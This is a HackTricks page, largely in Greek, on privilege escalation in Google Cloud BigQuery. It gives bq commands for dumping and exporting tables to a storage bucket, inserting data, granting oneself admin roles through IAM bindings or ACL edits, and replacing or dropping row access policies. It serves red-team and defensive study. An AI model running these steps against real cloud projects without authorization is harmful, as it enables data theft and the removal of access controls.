GCP - BigQuery Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

BigQuery

Για περισσότερες πληροφορίες σχετικά με το BigQuery, ελέγξτε:

GCP - Bigquery Enum

Read Table

Διαβάζοντας τις πληροφορίες που είναι αποθηκευμένες μέσα σε έναν πίνακα BigQuery, μπορεί να είναι δυνατό να βρείτε ευαίσθητες πληροφορίες. Για να αποκτήσετε πρόσβαση στις πληροφορίες, οι άδειες που απαιτούνται είναι bigquery.tables.get, bigquery.jobs.create και bigquery.tables.getData:

bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'

Export data

Αυτή είναι μια άλλη μέθοδος για να αποκτήσετε πρόσβαση στα δεδομένα. Εξάγετε το σε ένα cloud storage bucket και κατεβάστε τα αρχεία με τις πληροφορίες. Για να εκτελέσετε αυτήν την ενέργεια απαιτούνται οι εξής άδειες: bigquery.tables.export, bigquery.jobs.create και storage.objects.create.

bq extract <dataset>.<table> "gs://<bucket>/table*.csv"

Εισαγωγή δεδομένων

Μπορεί να είναι δυνατό να εισαγάγετε ορισμένα αξιόπιστα δεδομένα σε έναν πίνακα Bigquery για να εκμεταλλευτείτε μια ευπάθεια σε κάποιο άλλο σημείο. Αυτό μπορεί να γίνει εύκολα με τα δικαιώματα bigquery.tables.get , bigquery.tables.updateData και bigquery.jobs.create:

# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json

`bigquery.datasets.setIamPolicy`

Ένας επιτιθέμενος θα μπορούσε να εκμεταλλευτεί αυτό το προνόμιο για να δώσει στον εαυτό του επιπλέον δικαιώματα πάνω σε ένα σύνολο δεδομένων BigQuery:

# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

`bigquery.datasets.update`, (`bigquery.datasets.get`)

Αυτή η άδεια επιτρέπει να ενημερώσετε την πρόσβασή σας σε ένα BigQuery dataset τροποποιώντας τα ACLs που υποδεικνύουν ποιος μπορεί να έχει πρόσβαση σε αυτό:

# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>
## Read it with
bq head $PROJECT_ID:<dataset>.<table>

`bigquery.tables.setIamPolicy`

Ένας επιτιθέμενος θα μπορούσε να εκμεταλλευτεί αυτό το προνόμιο για να δώσει στον εαυτό του επιπλέον δικαιώματα πάνω σε έναν πίνακα BigQuery:

# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

Σύμφωνα με την τεκμηρίωση, με τις αναφερόμενες άδειες είναι δυνατή η ενημέρωση μιας πολιτικής γραμμής. Ωστόσο, χρησιμοποιώντας το cli bq χρειάζεστε μερικά ακόμη: bigquery.rowAccessPolicies.create, bigquery.tables.get.

bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

Είναι δυνατόν να βρείτε το ID φίλτρου στην έξοδο της καταμέτρησης πολιτικών γραμμής. Παράδειγμα:

bq ls --row_access_policies <proj>:<dataset>.<table>

Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09

Αν έχετε bigquery.rowAccessPolicies.delete αντί για bigquery.rowAccessPolicies.update, μπορείτε επίσης απλά να διαγράψετε την πολιτική:

# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Μια άλλη πιθανή επιλογή για να παρακάμψετε τις πολιτικές πρόσβασης γραμμών θα ήταν να αλλάξετε απλώς την τιμή των περιορισμένων δεδομένων. Εάν μπορείτε να δείτε μόνο όταν term είναι Cfba, απλώς τροποποιήστε όλα τα αρχεία του πίνακα ώστε να έχουν term = "Cfba". Ωστόσο, αυτό αποτρέπεται από το bigquery.

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousGCP - Batch Privesc NextGCP - ClientAuthConfig Privesc

Last updated 3 days ago

BigQuery

Read Table

Export data

Εισαγωγή δεδομένων

bigquery.datasets.setIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

BigQuery

Read Table

Export data

Εισαγωγή δεδομένων

bigquery.datasets.setIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

`bigquery.datasets.setIamPolicy`

`bigquery.datasets.update`, (`bigquery.datasets.get`)

`bigquery.tables.setIamPolicy`

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

`bigquery.datasets.setIamPolicy`

`bigquery.datasets.update`, (`bigquery.datasets.get`)

`bigquery.tables.setIamPolicy`

`bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`